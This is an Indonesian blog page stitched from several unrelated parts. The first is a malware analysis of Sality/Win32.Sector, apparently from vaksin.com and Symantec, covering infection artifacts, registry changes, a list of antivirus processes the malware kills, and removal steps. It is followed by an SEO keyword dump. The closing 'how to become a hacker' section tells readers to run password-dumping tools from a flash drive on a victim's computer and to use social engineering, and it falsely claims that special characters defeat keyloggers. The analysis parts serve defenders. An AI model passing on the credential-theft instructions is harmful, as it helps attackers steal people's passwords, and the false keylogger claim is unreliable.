Win32.Sector.2x Gabungan Virus Sality dan Virus Shortcut

Virus Win32.Sector.2x Gabungan Virus Sality dan Virus Shortcut.

Virus Sality yang merupakan virus paling terkenal di Indonesia, kini muncul kembali dengan metode penyebaran yang sama dengan virus shortcut yaitu dengan cara membuat shortcut palsu. Metode penyebaran ini, ditemukan dengan berbagai varian seperti Win32.Sector.21, Win32.Sector.22, Win32.Sector.23, dll oleh Dr.Web Scanner.

Celah keamanan .LNK (shortcut) memang sering digunakan oleh malware untuk melakukan penyebaran secara cepat. Terbukti beberapa malware yang menggunakan celah keamanan .lnk (shortcut) ini yang antara lain Sality (Sector atau Tanatos), Zeus (Zbot atau botnet), Chymine (worm YM atau conime/secupdat), Stuxnet (Winsta), VBNA/Hllw.Autoruner.xx (worm Vobfus atau Shortcut/Random).

File Virus Win32.Sector.2x (Sality-Shortcut)

Virus Sality-Shortcut dibuat menggunakan bahasa C yang telah di-kompres menggunakan program UPX dan memiliki ukuran file yang bervariasi. File virus utama memiliki ekstensi file exe (application) dan file pif (Shortcut to MS-Dos).

Saat menginfeksi komputer korban, virus akan membuat beberapa file induk seperti :

• C:\autorun.inf
• C:\[nama_acak].exe
• C:\[nama_acak].pif
• C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe

Selain itu, virus juga akan menyusupkan file driver berikut :

• C:\WINDOWS\system32\driver\[nama_acak].sys (umumnya amsint32.sys dan iirktn.sys)

Jika terkoneksi internet, virus akan mendownload file virus lain yaitu :

• C:\Documents and Settings\%user%\Desktop\[nama_acak].exe

Jika terdapat drive lain (removable drive/disk), maka virus akan membuat file :

• autorun.inf
• [nama_acak].exe
• [nama_acak].pif

Menggunakan metode yang sama dengan virus shortcut, Sality-Shortcut juga membuat kumpulan file shortcut. Hanya saja, file-file yang dibuat tidak berada pada komputer yang terinfeksi melainkan komputer lain yang dijadikan sebagai perantara (seperti server data yang menggunakan akses full-sharing) untuk menginfeksi komputer lain. File-file tersebut akan dibuat pada seluruh direktori yang ada. Beberapa file shortcut yang dibuat yaitu :

• Aline.lnk
• AnnaBensonSexvideo.lnk
• Anna.lnk
• Audra.lnk
• Badgirl.lnk
• Barbi.lnk
• BritneySpearsXXX.lnk
• Caitie.lnk
• CopyofNewFile.lnk
• CopyofNewFolder.lnk
• CopyofShortcut.lnk
• Drivers.lnk
• Fotograf.lnk
• Galleryphotos.lnk
• Jammie.lnk
• JennaElfmansexanaldeepthroat.lnk
• Juli.lnk
• Julie.lnk
• KateBeckinsalenudepictures.lnk
• Katrina.lnk
• Katrina.lnk
• Kelley.lnk
• Lisa.lnk
• Mandy.lnk
• Mary-Anne.lnk
• Mary.lnk
• MissAmericaPorno.lnk
• MyPhotos.lnk
• Mybeautifulperson.lnk
• Myphotoalbum.lnk
• Myphotos.lnk
• Myphotos.lnk
• NewFolder.lnk
• NewShortcut.lnk
• ParisHiltonXXXArchive.lnk
• Photoalbum.lnk
• Picture.lnk
• PornoScreensaver.lnk
• Rena.lnk
• Sara.lnk
• Serials.lnkBarrettJacksonnudephotos.lnk
• Shortcut.lnk
• Tammy.lnk
• XXXhardcore.lnk
• XXX.lnkXXX
• archive.lnk
• beautiful.lnk
• caroline.lnk
• groom.lnk
• kate.lnk
• kleopatra.lnk
• rebecca.lnk
• stacy.lnk
• coinst.dll.lnk
• ssres.dll.lnk
• itdrvkr.dat.lnk
• itdrvnr.chm.lnk
• itdrvsp.dat.lnk

Selain itu juga membuat file shortcut dengan nama file yang ada pada ‘My Documents” komputer yang terinfeksi (seolah-olah file tersebut merupakan link file pada dokumen), seperti :

• [nama_file].[ekstensi_file].lnk

Dan terakhir, virus akan menginjeksi file executable (application) yang sedang berjalan/aktif terutama file exe (Executable) dan scr (Screen Saver) sehingga ukuran file tersebut bertambah.

Gejala dan Efek Virus Win32.Sector.2x (Sality-Shortcut)

Beberapa gejala dan efek yang terjadi jika terinfeksi virus Sality-Shortcut yaitu sebagai berikut :

• Melakukan blok/disable terhadap fungsi Windows seperti (Task manager dan Registry Editor)

Sama seperti varian Sality yang terdahulu, virus mencoba mencegah aksi user yang mencoba mematikan proses dari virus.

• Modifikasi key Folder Options

Untuk mencegah agar tidak mudah dilihat atau dihapus, virus memodifikasi agar Folder Options tidak menampilkan file virus.

..

• Mematikan Windows Firewall (Internet Connection Sharing)

Hal ini dilakukan agar virus mudah melakukan koneksi ke IP Remote Server.

• Menambahkan key “IPSEC” pada Windows Firewall

Seandainya Windows Firewall diaktifkan virus tetap akan melakukan koneksi ke IP Remote Server, karena virus menambahkan key “IPSEC” pada registry Windows Firewall.

• Menambahkan string pada SYSTEM.INI

Jika pada umumnya virus Sality hanya menambahkan string [MCIDRV_VER], [DEVICEMB=XXXX], pada varian baru ini Sality-Shortcut menambahkan menjadi 2 string, yaitu dengan tambahan [fje32a1s], [minr=1].

• Melakukan koneksi ke IP Remote Server dan mendownload varian virus lain.

Dengan memonitor proses yang berjalan, virus mencoba melakukan koneksi ke IP remote server yang dituju melalui file executable yang diinfeksi seperti file explorer.exe. Setelah terkoneksi, virus mendownload varian malware lain agar tidak mudah terdeteksi dari antivirus.

• Mematikan proses dari aplikasi “security” (antivirus, antispyware, dll)

Virus mencoba mematikan aplikasi “security” seperti antivirus, antispyware, antimalware, firewall dan yang lainnya. Beberapa aplikasi tersebut yaitu sebagai berikut :

A2CMD, A2FREE A2GUARD A2SERVICE, ADVCHK, AGB, AHPROCMONSERVER, AIRDEFENSE, AKRNL, ALERTSVC, AMON, ANTIVIR APVXDWIN, ARMOR2NET, ASHAVAST, ASHDISP, ASHENHCD, ASHMAISV, ASHPOPWZ, ASHSERV, ASHSIMPL, ASHSKPCK, ASHWEBSV, ASWSCAN, ASWUPDSV, AVAST AVCENTER, AVCIMAN, AVCONSOL, AVENGINE, AVESVC, AVEVAL, AVEVL32, AVGAM AVGCC, AVGCC32, AVGCHSVX, AVGCSRVX, AVGCTRL, AVGEMC, AVGFWSRV, AVGNSX, AVGNT, AVGNTMGR AVGSERV, AVGTRAY, AVGUARD, AVGUPSVC, AVGWDSVC, AVINITNT, AVIRA AVKSERV, AVKSERVICE, AVKWCTL, AVP, AVP32, AVPCC, AVPM, AVSCHED32, AVSERVER, AVSYNMGR, AVWUPD32, AVWUPSRV, AVXMONITOR AVXQUAR, AVZ, BDSWITCH, BITDEFENDER, BLACKD, BLACKICE, CAFIX, CCEVTMGR, CCSETMGR, CFIAUDIT, CFP, CFPCONFIG, CLAMTRAY, CLAMWIN, CUREIT, DEFENDERDAEMON, DEFWATCH, DRVIRUS, DRWADINS, DRWEB, DWEBIO, DWEBLLIO, EKRN, ESCANH95, ESCANHNT, EWIDOCTRL, EZANTIVIRUSREGISTRATIONCHECK, F-AGNT95, F-SCHED, F-STOPW, FAMEH32, FILEMON, FIREWALL FORTICLIENT, FORTISCAN, FORTITRAY, FPAVSERVER, FPROTTRAY, FPWIN, FRESHCLAM, FSAV32, FSAVGUI, FSBWSYS, FSDFWD, FSGK32, FSGK32ST, FSGUIEXE, FSMA32, FSMB32, FSPEX, FSSM32, GCASDTSERV, GCASSERV, GIANTANTISPYWARE, GUARDGUI, GUARDNT, GUARDXKICKOFF, GUARDXSERVICE, HREGMON, HRRES, HSOCKPE, HUPDATE, IAMAPP, IAMSERV, ICLOAD95, ICLOADNT, ICMON, ICSSUPPNT, ICSUPP95, ICSUPPNT, INETUPD, INOCIT, INORPC, INORT, INOTASK, INOUPTNG, IOMON98, IPTRAY, ISAFE, ISATRAY, KAV, KAVMM, KAVPF, KAVPFW, KAVSTART, KAVSVC, KAVSVCUI, KMAILMON, MAMUTU, MCAGENT, MCMNHDLR, MCREGWIZ, MCUPDATE, MCVSSHLD, MINILOG, MYAGTSVC, MYAGTTRY, NAVAPSVC, NAVAPW32, NAVLU32, NAVW32, NEOWATCHLOG, NEOWATCHTRAY, NISSERV NISUM, NMAIN, NOD32 NORMIST, NOTSTART, NPAVTRAY, NPFMNTOR, NPFMSG, NPROTECT, NSCHED32, NSMDTR, NSSSERV, NSSTRAY, NTOS, NTRTSCAN, NTXCONFIG, NUPGRADE, NVCOD, NVCTE, NVCUT, NWSERVICE, OFCPFWSVC, ONLINENT, OP_MON, OPSSVC, OUTPOST PAVFIRES, PAVFNSVR, PAVKRE, PAVPROT, PAVPROXY, PAVPRSRV, PAVSRV51, PAVSS, PCCGUIDE, PCCIOMON, PCCNTMON, PCCPFW, PCCTLCOM, PCTAV, PERSFW, PERTSK, PERVAC, PESTPATROL PNMSRV, PREVSRV, PREVX PSIMSVC, QHONLINE, QHONSVC, QHSET, QHWSCSVC, QUHLPSVC, RFWMAIN, RTVSCAN, RTVSCN95, SALITY SAPISSVC, SAVADMINSERVICE, SAVMAIN, SAVPROGRESS, SAVSCAN, SCANNINGPROCESS, SCANWSCS, SDHELP, SDRA64, SHSTAT, SITECLI, SPBBCSVC, SPHINX, SPIDERCPL, SPIDERML, SPIDERNT, SPIDERUI, SPYBOTSD, SPYXX, SS3EDIT, STOPSIGNAV, SWAGENT, SWDOCTOR, SWNETSUP, SYMLCSVC,SYMPROXYSVC, SYM SPORT, SYMWSC, SYNMGR, TAUMON, TBMON, TMLISTEN, TMNTSRV, TMPROXY, TNBUTIL, TRJSCAN, TROJAN, VBA32ECM, VBA32IFS, VBA32LDR, VBA32PP3, VBSNTW, VCRMON, VPTRAY, VRFWSVC, VRMONNT, VRMONSVC, VRRW32, VSECOMR, VSHWIN32, VSMON, VSSERV, VSSTAT, WATCHDOG, WEBSCANX, WINSSNOTIFY, WRCTRL, XCOMMSVR, ZLCLIENT, ZONEALARM

• Mematikan fungsi monitoring software security

Virus mencoba mencegah dari akses monitoring software, hal ini dilakukan dengan membaca file “NTOSKRNL.EXE” melalui file driver yang telah disusupkan kedalam system. Dengan cara ini virus mencoba melakukan “by-pass” atau “exclude”, sehingga fitur On-Access Scanner dari antivirus tidak membaca.

• Mematikan “System Restore”

Dengan mematikan fitur ini, virus berusaha mencegah system komputer kembali seperti sebelum terinfeksi virus.

• Mematikan “Safe Mode” atau “Safe Boot”

Sama seperti varian virus Sality lainnya, virus juga berusaha mematikan fungsi “Safe Mode” Windows. Dengan cara ini, maka akan mempersulit pembersihan virus secara manual.

Virus Win32.Sector.2x (Sality-Shortcut) Mematikan Registry

Beberapa perubahan yang dilakukan oleh virus yaitu :

- Merubah Registry

- Mematikan fungsi Security Center

Agar program dan aplikasi keamanan tidak dapat berjalan dengan normal, maka virus merubah key berikut :

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

AntiVirusDisableNotify = 1
AntiVirusOverride = 1
FirewallDisableNotify = 1
FirewallOverride = 1
UacDisableNotify = 1
UpdatesDisableNotify = 1

- Modifikasi folder Option

Untuk mencegah agar file virus tidak mudah dilihat, dengan key berikut :

• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer

Hidden = 2

- Mematikan Windows Firewall

Agar Windows Firewall tidak aktif dengan membuat key berikut :

• HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

EnableFirewall = 0

- Menambah Registry

- Aktif pada saat meng-akses drive

Virus membuat key pada registry agar aktif saat mengkases drive tertentu, yaitu :

• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C

Shell\AUtoPLay\CommaND = C:\[nama_acak].exe
Shell\AutoRun\command = C:\[nama_acak].exe
Shell\eXplore\COMmaND = C:\[nama_acak].exe
Shell\oPeN\coMmanD = C:\[nama_acak].exe

• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5b7fdd69-e6fd-11df-a9bd-806d6172696f}

Shell\AUtoPLay\CommaND = C:\[nama_acak].exe
Shell\AutoRun\command = C:\[nama_acak].exe
Shell\eXplore\COMmaND = C:\[nama_acak].exe
Shell\oPeN\coMmanD = C:\[nama_acak].exe

• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5b7fdd69-e6fd-11df-a9bd-806d6172696f}

Shell\AUtoPLay\CommaND = D:\[nama_acak].pif
Shell\AutoRun\command = D:\[nama_acak].pif
Shell\eXplore\COMmaND = D:\[nama_acak].pif
Shell\oPeN\coMmanD = D:\[nama_acak].pif

- Mematikan Task Manager dan Registry Editor

Virus melakukan hal ini dengan menambah pada key berikut :

• HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

DisableRegistryTools = 1
DisableTaskMgr = 1

- Mematikan UAC (User Acount Control)

• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system

EnableLUA = 0

- Menambah key pada Windows Firewall

• HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

[nama_file]:*:enabled:ipsec = [nama_file]

- Menyusupkan file driver pada system

Virus menyusupkan file driver pada system dengan membuat key berikut :

• HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\amsint32

Type = 1
Start = 3
ErrorControl = 1
ImagePath = %System%\drivers\[nama_acak].sys
Displayname = amsint32

- Menghapus Registry

- Menghapus mode Safe Mode / Safe Boot

Virus menghapus pada key berikut :

• HKLM\System\CurrentControlSet\Control\SafeBoot

• HKCU\System\CurrentControlSet\Control\SafeBoot

Metode Penyebaran Virus Win32.Sector.2x (Sality-Shortcut)

Sama seperti virus shortcut, awalnya virus Sality-shortcut melakukan penyebaran melalui berbagai website yang mengandung trojan dan link spam pada e-mail, serta pada program crack/keygen.

Setelah komputer terinfeksi, virus melakukan penyebaran melalui media removable drive/disk dan menginjeksi program/aplikasi yang berjalan/aktif dan program-program executable. Program yang di injeksi memiliki ekstensi EXE (executable), dan SCR (Screen Saver).

Selain itu, dengan memanfaatkan akses full-sharing dan mapping drive dalam jaringan dengan membuat beberapa file shortcut pada semua folder.

[http://vaksin.com]

Remove Virus Win32.Sector.2x (Virus Sality-Shortcut) …..

virus shortcut , anti virus shortcut , win32 sector 22 , win32 sector 21 , virus shortcut removal , cara mematikan virus shortcut , virus shortcut dan sality , menghapus virus MS DOS , virus shortcut dos , menghapus virus tami pif , menghilangkan virus shortcut melalui dos , cara menghapus virus ms dos , win32 sector , antivirus untuk menghilangkan virus shortcut ink , menghilangkan virus lnk di windows 7 , penghapus file virus shortcut to MS-DOS , menghilangkan virus ms dos , menghilangkan virus shortcut MS DOS , menghilangkan virus msdos , menghilangkan virus salty autorun inf , menonaktifkan virus shortcut lewat dos , menghilangkan virus file pif , menghilangkan virus * lnk , mematikan virus yang membuat short cut , membasmi virus msdos dan autorun inf , membunuh autorun dengan dos , mengantisipasi virus win32 , mengatasi masalah avcenter exe tidak ditemukan , mengatasi shortcut tidak macet karena virus , mengatasi virus exe pif , mengatasi virus shortcut to ms dos , menghapus dengan ms dosvirus conficker , menghapus virus shortcut ms dos prompt , cara sality mengahapus drive lain , penularan virus sality , penyebaran virus shortcut , remove sality virus shortcut , Virus pembuat file PIF dan exe di Drive , virus shorcut ms dos , sality dam make pif files , win32 sector21 , virus shortcut membuat word menjadi shortcut , virus shortcut w32 , virus sortcut ms dos , virus win32 , virut * pif , win32 sector 1 , VIRUS pacarku pif , virus ms-dos shorcut , removed virus ms-dos

2

Virus Sality

Sality Virus Terkenal di Indonesia, Clean, Remove & Repair Virus Sality

Setelah beberapa kali kubahas Conficker / downadup / kido yang merupakan jenis worm yang paling banyak kita temui di Indonesia. Virus Sality ini yamg diperkirakan dari Taiwan / Cina banyak kita temui di sini dengan perkembangan varian yang terus berganti.

Nama lain virus : W32/Sality.AE, W32.Sality.AE, TROJ_AGENT.XOO [Trend], W32/Sality.ae [McAfee], Sality.AG [Panda Software], Win32/Sality.Z [Computer Associates], Win32/Sality.AA [Computer Associates]

Virus ini akan meng infeksi dan merusak file exe / com / scr. Ukuran file yang sudah terinfeksi Sality akan bertambah besar beberapa KB dan masih dapat di jalankan seperti biasa. Biasanya virus ini akan mem blok antivirus atau removal tools selain itu juga akan memblok task manager atau registry editor Windows. Untuk mempermudah dalam proses penyebarannya selain memanfaatkan File Sharing dan Default Share virus ini juga akan memanfaatkan media Flash Disk dengan cara membuat file acak dengan ekstensi exe/com/scr/pif serta menambahkan file autorun.inf

Untuk blok task manager atau Registry tools, Sality akan membuat :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system

• DisableRegistryTools

• DisableTaskMgr

File yang terinfeksi akan men dekrip dirinya dan mencoba copy *.dll (acak) dan menginjeksi file lain yang aktif di memori serta file lain yang terdapat di computer dan network (file sharing) serta menginfeksi file *.exe yang terdapat dalam list registry hingga virus dapat aktif secara otomatis setiap kali komputer dinyalakan.

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run

• HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

Beberapa file *.dll yang akan di drop oleh Sality.

• C:\Windows\system32\syslib32.dll

• C:\Windows\system32\oledsp32.dll

• C:\Windows\system32\olemdb32.dll

• C:\Windows\system32\wcimgr32.dll

• C:\Windows\system32\wmimgr32.dll

Selain membuat file DLL, sality juga akan membuat file *.sys [acak] di direktori C:Windowssystem32drivers [misal : kmionn.sys]

Blok Antivirus dan software security

program security dan antivirus yang dimatikan prosesnya : ALG, aswUpdSv, avast! Antivirus, avast! Mail Scanner, avast! Web Scanner, AVP, BackWeb Plug-in – 4476822, bdss, BGLiveSvc, BlackICE, CAISafe, ccEvtMgr, ccProxy, ccSetMgr, F-Prot Antivirus Update Monitor, fsbwsys, FSDFWD, F-Secure Gatekeeper Handler Starter, fshttps FSMA,InoRPC, InoRT, InoTask, ISSVC, KPF4, LavasoftFirewall, LIVESRV, McAfeeFramework, McShield, McTaskManager, navapsvc, NOD32krn, NPFMntor, NSCService, Outpost Firewall main module, OutpostFirewall, PAVFIRES, PAVFNSVR, PavProt, PavPrSrv, PAVSRV, PcCtlCom, PersonalFirewal, PREVSRV, ProtoPort Firewall service, PSIMSVC, RapApp, SmcService, SNDSrvc, SPBBCSvc, Symantec Core LC, Tmntsrv, TmPfw, tmproxy, UmxAgent, UmxCfg, UmxLU, UmxPol, vsmon, VSSERV, WebrootDesktopFirewallDataService, WebrootFirewall, XCOMM

Beberapa website juga di blok seperti : Cureit, Drweb, Onlinescan, Spywareinfo, Ewido, Virusscan, Windowsecurity, Spywareguide, Bitdefender, Panda software, Agnmitum, Virustotal, Sophos, Trend Micro, Etrust.com, Symantec, McAfee, F-Secure, Eset.com, Kaspersky

Sality juga merubah registry :

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Setting\”GlobalUserOffline” = “0″

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\”EnableLUA” = “0″

• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xxx [xxx adalah acak, contoh : abp470n5]

• HKEY_CURRENT_USER\Software\[USER NAME]914

• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WMI_MFC_TPSHOKER_80

• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER

Selain itu akan merubah beberapa string registry Windows Firewall berikut dengan menambahkan value dari 0 menjadi 1:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

• AntiVirusDisableNotify

• AntiVirusOverride

• FirewallDisableNotify

• FirewallOverride

• UacDisableNotify

• UpdatesDisableNotify

dan membuat key “SVC” serta string berikut dengan value 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc

• AntiVirusDisableNotify

• AntiVirusOverride

• FirewallDisableNotify

• FirewallOverride

• UacDisableNotify

• UpdatesDisableNotify

Sality menghapus key HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesALG.

ALG ( Application Layer Gateway Service ) adalah services yang memberikan support untuk plug-in protokol aplikasi dan meng-enable konektivitas jaringan / protokol. Jika service ini dimatikan, program seperti MSN Messenger dan Windows Messenger tidak akan berfungsi. Service ini bisa dijalankan, hanya jika menggunakan firewall, baik firewall bawaan Windows atau firewall lain. Jika tidak komputer yang terinfeksi virus ini akan mengalami celah keamanan yang serius.

..

Blok safe mode

User tidak dapat booting pada mode “safe mode” hal imi di sebabkan adannya penghapusan key :

• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot

• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot

• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

Injeksi file exe / com / scr

File yang ber ekstensi “.exe” yang terdapat dalam list registry menyebabkan virus dapat aktif secara otomatis setiap kali komputer dinyalakan.

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run

• HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

File yang di injeksi ukurannya bertambah sekitar 68 – 80 KB dari ukuran semula. Salah satu kecanggihan Sality adalah kemampuannya menginjeksi file induk sehingga ukuran file bervirus tidak seragam, jelas lebih sulit diidentifikasi dibandingkan virus lain yang menggantikan file yang ada sehingga ukuran filenya akan sama besar.

Tidak semua program antivirus dapat membersihkan file yang sudah terinfeksi Sality, file tersebut bisa rusak setelah di scan dan di bersihkan oleh antivirus tersebut.

Untuk memperlancar aksinya, virus ini akan akan melakukan koneksi ke sejumlah alamat web yang sudah ditentukan, dan men download trojan / virus lainnya yang di sinyalir merupakan varian dari versi sebelumnya ( update ).

Eksploitasi Default Share dan Full Sharing

Sality akan menyebar dengan cepat melalui jaringan dengan memanfaatkkan default share windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr. Maka sebaiknya nonaktifkan Default Share (C$, D$ .. dst) dan hindari Full Sharing folder di jaringan.

Sality juga akan menambahkan string [MCIDRV_VER] dan DEVICEMB=xxx, dimana xxx menunjukan karakter acak ke dalam file C:Windowssystem.ini.

Clean, Remove & Repair Virus Sality

CARA PEMBERSIHAN SALITY

Putuskan hubungan komputer dari jaringan dan internet

Matikan System Restore selama proses pembersihan berlangsung.

Matikan Autorun dan Default Share, buat *.inf (misal repair.inf dari notepad atau download di sini filenya), klik kanan – install

[Version]
Signature="$Chicago$"
Provider=Vaksincom
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\CurrentControlSet\Services\lanmanserver\parameters, AutoShareWks,0x00010001,0
HKLM, SYSTEM\CurrentControlSet\Services\lanmanserver\parameters, AutoShareServer,0x00010001,0
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKLM, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKLM, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr

Matikan program aplikasi yang aktif di memori terutama dalam daftar startup.

Scan dengan removal tools dengan terlebih dahulu merubah ekstensi dari removal tools tersebut dengan ekstensi lain ( misal, *.exe menjadi *.cmd ) atau pakai media write protect, file removal tersebut tidak di infeksi ulang oleh Sality.

Sality Repair lainnya :

• Sality Repair
• Fix Register

Clean, Remove & Repair Virus Sality

Delete the value from the registry (symantec)

1. Click Start > Run.
2. Type regedit
3. Click OK.Note: If the registry editor fails to open the threat may have modified the registry to prevent access to the registry editor. Security Response has developed a tool to resolve this problem. Download and run this tool, and then continue with the removal.
4. Navigate to and delete the following registry entry:
   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"[INFECTED FILE]" = "[INFECTED FILE]:*:Enabled:ipsec"
5. Navigate to and delete the following registry subkeys:
   HKEY_CURRENT_USER\Software\[USER NAME]914
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WMI_MFC_TPSHOKER_80
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER
6. Restore the following registry entries to their previous values, if required:
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Setting\"GlobalUserOffline" = "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA" = "0"
7. Restore registry entries under the following registry subkeys to their previous values, if required:
   HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
8. Exit the Registry Editor.

From : Symantec and vaksin.com

Bagaimana Cara Menjadi Hacker?

Banyak cara menjadi seorang hacker, dari cara yang paling mudah hingga cara yang paling sulit. Beberapa orang memakai software untuk melakukan hack.Cara yang dipakai hacker untuk melakukan hack diantaranya pirates facebook,keylogger,mail passview,messenpass,social engineering,web spoofing,menghadang email,password cracking,session hijacking,menjadi proxy server,memanfaatkan kelalaian user dalam menggunakan fitur browser, dan googling.

disini

Pirates facebook

merupakan software yang bekerja dengan menggunakan nomor id facebook serta IP address facebook. Cara ini memang langsung menemukan kita pada email dan password korban namun yang mempersulit kita dalam pemakaian software ini adalah mengetikan IP Address. IP Address selalu berubah dalam waktu yang sangat singkat,dalam hitungan detik. Untuk menggunakan software ini diperlukan kerja keras,semangat dan kecepatan.

Mail PassView dan MessenPass

berfungsi untuk mengetahui password yahoo messenger. Penggunaan software ini sangat simple dengan mendownload software ini di website www.nirsoft.net kemudian menyimpan file tersebut di flashdisk dan memasukkannya pada computer korban. Software tersebut bekerja dalam hitungan 3 detik. Jadi, anda dapat melakukannya dengan mencolokkan flashdisk pada computer korban kemudian klik software tersebut. Dalam hitungan detik software bekerja mengcopy semua password yang pernah diketik pada computer korban.

Social Engineering

adalah nama suatu teknik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban. Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga. Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. Sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.

KeyLogger

adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti formpassword misalnya. Ada cara aman untuk menghindari keyloger:

1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakankeyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasangkeyloger) tidak akan mendapatkan password anda yang sebenarnya.
